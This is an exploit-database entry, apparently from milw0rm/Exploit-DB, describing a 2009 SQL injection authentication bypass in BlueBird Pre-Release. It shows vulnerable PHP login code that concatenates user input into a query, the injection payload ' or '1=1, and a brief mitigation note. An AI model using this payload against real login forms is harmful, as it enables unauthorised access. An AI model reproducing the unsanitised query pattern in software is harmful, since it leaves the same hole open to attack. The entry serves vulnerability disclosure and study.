header-logo
Suggest Exploit
vendor:
BlueBird Pre-Release
by:
x0r
8.5
CVSS
HIGH
Authentication Bypass
20
CWE
Product Name: BlueBird Pre-Release
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BlueBird Pre-Release Auth Bypass

A vulnerability exists in BlueBird Pre-Release, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to the application not properly sanitizing user-supplied input passed to the 'username' parameter in the 'login.php' script. This can be exploited to bypass authentication by entering ' or '1=1' as username.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to bypass authentication.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : BlueBird Pre-Release
Download       : http://downloads.sourceforge.net/bluebird/bluebird_pre.zip
Vulnerability  : Auth Bypass
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login.php

[Code]
if ( $request == "POST" )
{
	$username = $_POST['username'];
	$passwd = $_POST['passwd'];
	
	// Call mysql class
	$db = new db;
	$db->connect();
	$sql = "SELECT * FROM bluebird_users WHERE username='$username' &&
password='$passwd' ";
	$check_query = $db->query($sql);
	$row = mysql_numrows($check_query);
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: ' or '1=1

########################################################################################

# milw0rm.com [2009-02-10]